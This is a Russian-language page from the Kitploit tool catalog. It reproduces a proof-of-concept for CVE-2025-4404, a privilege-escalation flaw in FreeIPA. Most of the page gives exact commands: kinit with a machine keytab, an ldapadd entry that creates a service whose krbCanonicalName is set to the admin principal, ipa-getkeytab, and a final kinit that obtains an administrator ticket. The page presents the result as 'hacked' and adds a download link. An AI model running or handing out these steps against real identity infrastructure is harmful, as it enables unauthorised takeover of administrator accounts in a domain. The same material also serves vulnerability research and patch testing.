Skip to content
KitploitKITPLOIT
ИнструментыБлог
Отправить
ИнструментыБлог
Отправить

Инструменты для хакинга, пентеста и кибербезопасности — ваш арсенал защиты!

Kitploit — это каталог инструментов для хакинга, кибербезопасности и пентестинга. Находите последние обновления проектов для поиска уязвимостей, анализа систем, автоматизации тестирования и усиления вашей безопасности.

··Ленты·Контакты·Конфиденциальность·© 2026 Kitploit

Каталог инструментов

Категории

Все категории
Loading categories
CVE-2025-4404-POC — PoC для CVE-2025-4404 | Kitploit
Инструменты/GitHubGitHub/im10n/cve-2025-4404-poc
Повышение привилегийАнализ уязвимостейЭксплуатацияТестирование на ПроникновениеАутентификация
GitHubim10n/cve-2025-4404-poc

CVE-2025-4404-POC

PoC для CVE-2025-4404

Репозиторий
621 год назадЕщё не проверено

Популярное

Смотреть все →

Откройте для себя самые используемые инструменты нашего сообщества.

Изучить все инструменты

Просмотрите нашу коллекцию инструментов

Смотреть все инструменты →
Поделиться

CVE-2025-4404 POC

POC для CVE-2025-4404

Если у вас есть доменная учетная запись компьютера (host/pc1.[email protected]), то по умолчанию вы можете добавить службу. Также вы можете задать krbPrincipalName и krbCanonicalName. По умолчанию значение атрибута krbCanonicalName отсутствует для учетной записи администратора FreeIPA 4.12.4. Вы можете запросить билет Kerberos со значением krbPrincipalName, но билет будет содержать значение krbCanonicalName.

Поехали

  1. Сначала запросим билет от имени учетной записи компьютера: $ kinit host/[email protected] -k -t /etc/krb5.keytab

  2. Добавьте сервисную учетную запись в LDAP:

root@kitploit:~
$ ldapadd -H ldap://dc1.test.local
dn: krbprincipalname=test/[email protected],cn=services,cn=accounts,dc=test,dc=local
ipaKrbPrincipalAlias: test/[email protected]
krbPrincipalName: test/[email protected]
objectClass: ipaKrbPrincipal
objectClass: ipaObject
objectClass: ipaService
objectClass: krbPrincipal
objectClass: krbPrincipalAux
objectClass: top
krbCanonicalName: [email protected]
managedBy: fqdn=pc1.test.local,cn=computers,cn=accounts,dc=test,dc=local
  1. Запросите keytab
root@kitploit:~
$ ipa-getkeytab -p test/[email protected] -k ./test.keytab --mech=GSSAPI
$ kdestroy -A
  1. Запросите билет $ kinit --no-request-pac -k -t ./test.keytab test/[email protected]

Взломано!!!

Проверить билет можно с помощью: ldapwhoami -H ldap://dc1.test.local

Скачать инструмент